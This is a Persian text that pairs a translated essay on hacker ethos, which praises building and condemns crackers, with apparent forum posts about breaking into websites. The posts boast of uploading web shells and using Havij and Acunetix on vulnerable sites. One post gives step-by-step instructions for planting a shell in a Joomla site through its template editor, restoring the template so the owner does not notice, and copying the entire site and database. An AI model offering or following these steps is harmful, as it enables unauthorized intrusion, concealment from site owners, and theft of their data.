هنری بیابید. هکرهای نرم افزار این هم روحان را در هر جا می شناسند، آنان را 'هکر ' می نامند و برخی معتقدند که طبیعت هکر واقعا مستقل از زمینه ایست که او در آن کار می کند. اما در تمام این مقاله ما بطور خاص بر مهارت ها و منش های هکر نرم افزار، و فرهنگ های مشترکی که واژه ی 'هکر' را بوجود آورد تمرکز خواهیم کرد. گروه دیگری از مردم هستند که متکبرانه خود را هکر می نامند اما نیستند! این مردمان (که بیشتر نرهای نابالغند) کسانی هستند که سیستمهای کامپیوتری و مخابراتی را 'تخریب' می کنند. هکرهای واقعی اینان را 'شکننده (Cracker) ' می نامند و هیچ کاری به آنان ندارند. هکرهای واقعی اعتقاد دارند که اینان تنبل، بی مسئولیت و نه چندان باهوشند و می دانند که توانایی نفوذ به سیستمهای امنیتی شما را هکر نمی کند. همانگونه که دزدان اتومبیل را هیچگاه نمی توان مکانیک نامید. متأسفانه بسیاری از روزنامه نگاران و نویسندگان ناآگاهانه واژه ی' هکر ' را برای توصیف شکننده ها (Crackers) بکار می برند و هکرها را تا سرحد مرگ عصبانی می کنند. تفاوت اصلی این است: هکرها می سازند اما شکننده ها ویران میکنند. اگر می خواهید هکر باشید (همواره ) مطالعه کنید. اما اگر می خواهید شکننده شوید گروه خبری alt.2600 را بخوانید و آماده باشید که ۵ تا ۱۰ سال را در زندان بگذرانید، پس از اینکه فهمیدید به اندازه ای که فکر می کردید زرنگ نیستید. این تمام چیزی است که درباره ی شکننده ها (Crackers) خواهم گفت. منش هکر منش هکر، هکر می آفریند و یاری می کند. او به آزادی و یاری متقابل معتقد است؛ برای آن که هکر نامیده شوید باید چنان رفتار کنید که گویا چنین منشی دارید و برای اینکه اینگونه رفتار کنید باید واقعا آن را داشته باشید. اگر به پروراندن منش هکر تنها برای پذیرفته شدن در این فرهنگ می اندیشید در اشتباه هستید! چنین منشی داشتن همواره کمکتان میکند یادگیرید و با انگیزه باشید. مانند تمام هنرها بهترین راه استاد شدن، نگاه کردن به استاد و تقلید از اوست - نه فقط در باب تفکر که حتی در احساس! همانگونه که در شعر ذن زیر آمده است: تا که راه یابی: : To follow the path به استاد بنگر ، ,look to the master به دنبالش باش ، , follow the master با او برو ، ,walk with the master از نگاه او بنگر ، , see through the master, استاد شو! . become the master پس اگر میخواهید استاد شوید، آن قدر ذکرهای زیر را بگویید(افکار زیر را با خود مرور کنید) تا باورشان کنید: ۱- جهان پر از مشکلات جذابی است که میباید حل گردند. هکر بودن هیجان دارد، اما هیجانی که نیازمند تلاش فراوان است و تلاش کردن نیازمند انگیزه. ورزشکاران موفق انگیزه خود را از لذتی که در جسمشان احساس میکنند، می گیرند؛ در گذر از حدود جسمانیشان. شما نیز باید از حل مشکلاتتان مشعوف شوید. از پیشرفت مهارتتان و زورآزمایی اندیشه ی تان. اگر شما به طور ذاتی چنین شخصی نیستید باید این گونه گردید و گرنه انرژیتان با شهوت، پول، شهرت و ... به هدر خواهید داد. (همچنین باید به توانایی یادگیریتان ایمان آورید - باور به اینکه: گر چه تمام آن چه را لازم دارید نمی دانید اما اگر تنها بخشی از آنرا کشف کنید توانایی حل باقی را بدست می آورید) ۲-هیچ مشکلی نباید دوبار حل گردد اندیشه های خلاق گرانبها و محدودند. ذهن های خلاق باارزش هستند، منابعی محدود. آنان نباید با دوباره کشف کردن چرخ، به هدر بروند در حالی که هزاران معمای حل نشده جذاب باقی است. برای آن که کرداری مانند یک هکر داشته باشید باید باور کنید که وقت هکرها گرانبهاست - آنچنان که گویی یک وظیفه روحانی است که اطلاعتان را مبادله کنید، مشکلات را حل کنیدو راه حل ها را به دیگر هکرها بدهید تا آنان مشکلات جدیدتر را مرتفع کنند. بجای آنکه دائما حول همان ها بگردند. (مجبور نیستید باور داشته باشید که تمام آنچه را خلق می کنید باید ببخشید- گرچه هکرهایی که چنین می کنند محترم ترین آنان هستند - با ارزش های هکر سازگار است که مقداری از آن را بفروشید تا برای خود خورد و خوراک و کامپیوتر تهیه کنید. چه خوب است اگر استعداد هکری خود را برای حمایت از خانواده و حتی ثروتمند شدن بکار گیرید، تا هنگامی که شرافت هنرتان و رفیقان هکرتان را فراموش نکنید.) ۳ -کسالت و بیکاری شیاطینند. هکرها (و عموما انسانهای خلاق) هرگز نباید کسل شوند یا مجبور به بیگاری شوند چرا که در این صورت آنها از انجام کاری که تنها آنان قادر به انجام آنند باز می مانند. این هرز رفتن همه را آزار می دهد. بنابراین کسالت و بیگاری نه تنها ناخوشایند بلکه واقعا شیاطینند. برای اینکه مانند یک هکر رفتار کنید باید باور کنید که می خواهید تمام کسالت آوران را کنار بزنید نه تنها برای خودتان بلکه برای همه (خاصه سایر هکرها). (یک استثناء بارز وجود دارد. هکرها گاهی کارهایی انجام می دهند که به نظر تکراری و خسته کننده می رسند، تنها برای پاکسازی ذهن شان یا برای بدست آوردن تجربه ای خاص. اما به اختیار ،هیچ فرد اندیشمندی نباید مجبور به پذیرفتن موقعیت کسل کننده ای گردد.) ۴-آزادی خوب است. هکرها ذاتا ضد استبدادند. هر که به شمادستور دهد، شما را از پرداختن به آنچه عاشق کشف آنید باز می دارد؛ گر چه آنان همواره برای دستوراتشان دلایل ابلهانه ی خود را دارند. با منش استبدادی باید مبارزه شود هر جا که پیدا شود چرا که شما و تمام هکرها را تحت فشار می گذارد . (این به مفهوم مخالفت کلی با اتورتیه نیست. کودکان باید راهنمایی شوند و جنایتکاران مراقبت. هکر ممکن است نوعی از اتورتیه را قبول کند تا بیشتر از زمانی که برای اجرای دستورات از دست می دهد، بدست آورد. اما این تنها یک معادله آگاهانه است. یک قدرت فردی که مستبدان می خواهند قابل قبول نیست.) مستبدان تنها با سانسور و پنهان کاری رشد می کنند و به همکاری داوطلبانه اعتمادی ندارند. آنها فقط نوعی از همکاری را دوست دارند که در کنترل آنان باشد، بنابراین برای اینکه یک هکر باشید باید دشمنی ذاتی با سانسور و رازداری، اعمال قدرت و سیاست برای مجبور ساختن افراد متعهد را در خود بپرورانید و باید که براین باور عمل کنید. ۵ -منش جایگزین مهارت نیست. برای آنکه هکر شوید مجبور به پروراندن مواردی از این منش هایید. اما تنها تقلید از این منشها شما را هکر نمی سازد همانگونه که شما را قهرمان یا خواننده نمی کند. هکر شدن احتیاج به تیزهوشی، تمرین، تمرکز و کار سخت دارد. بنابراین شما باید یاد بگیرید که به منش مشکوک و به مهارت احترام بگذارید. هکرها نمی گذارند فضولان وقت شان را هدر دهند و به مهارت ایمان دارند به خصوص مهارت در درک کردن گرچه مهارت در هر زمینه ای دلپذیر است. مهارت در زمینه های مورد نیاز که متخصصان کمتری دارد بهتر است و تخصص در زمینه های مورد نیاز که به فکر متبحر، استادی و تمرکز نیاز دارند، بهترین. اگر شیفته مهارت باشید از پروراندن آن در خود لذت خواهید برد . کار سخت و تمرکز بجای کاری کسالت بار به بازی سخت شبیه می گردد و این برای هکر شدن حیاتی است .
  23. نیازی نیست به آپلود شل شل آپ کردن خیلی مهمه حالا قدیمی بشه یا جدید پس داشته باشی نداشته باشی ( شل دست و پای منه هکره ) چون اگه من هکر با تمام قدرتی که دارم باز به شل که تو سرور میریزم اتکا میکنم چرا ؟ چون اگه همه پسورد هارو تغییر بده با شل میشه پیدا کرد . من یه شل ار سایت خارجی میزارم . زیاد باهاش ور نرین .( IPیتون تو سرور اصلی ثبت نشه ) هرگونه سواستفاده به خودتون مربوت میشه این نسخه جومینا خودش باگ داره ماشاالله !! من در باره هیچ نسخه جوملا نگفتم میشه بگی شما کدومو میگی ؟
  24. مهم ترینش پیدا کردن باگ . اگه یک باگ داشته باشی همه کار بکنی با "Havij و یا Acunetix هک میشی که من خوراکمه . سایتهای خارجیه با امنیت بالا و دارای یک باگ که از دست ادمین درفته هک میشه من خیلی سراق دارم
  25. نمونه کارمم میزارم آموزش هک جوملا- کپی اطلاعات یک سایت جوملا میخوام روش آپ شل در جومیلا و روش کار برای دانلود کل اطلاعات سایت آموزش بدم. برای آپ شل باید اول برید توی "مدیریت قالب" روی یک قالب کلیک کنید تا تنضیمات اون واشه . 1- از منو روی "ویرایش HTML " کلیک کنید و کد شل که میزارم با کد "index.php" جایگزین کنید . ( از کد اصلی بکاپ بگیرین تا بعد از آپ شل درستش کنی تا کسی ... نفهمه که سایتش هک شده) 2- سیو کنین و به آدرس برین . 2- خوب شل بالا اومد . یه جای خوب پیدا کنین و شل آپ کنین و تمی که دست کاری کردین درستش کنین و کار تموم شد . به آدرس جدید برین و حالش ببرین . روش بکاپ گیری اینجوریه که شما از کمپاین "کامپوننت ساخت بسته نصبی از جوملا" استفاده کنین . زمینه شد برای باز کردنشم نرم افزار "SetupAkeebaExtractWizard" استفاده کنین . زمینه شد بکاب بگیرین حالشو ببرین . یه هوشدار مهم هر چیزی رو از هرجا نگیرین و تو هاست نریزین ( شاید شل توش آپ کنن ) بد بیچاره میشی کل اطلاعات هاستو از دیتابیس تا کل فایلات باید پاک کنی و دوباره نسب کنی تا خیالت راهت بشه که شل یا چیزای دیگه توسایتت نباشه اینم بگم شل میتونه هر فرمتی باشه [ATTACH]480[/ATTACH][ATTACH]481[/ATTACH][ATTACH]482[/ATTACH]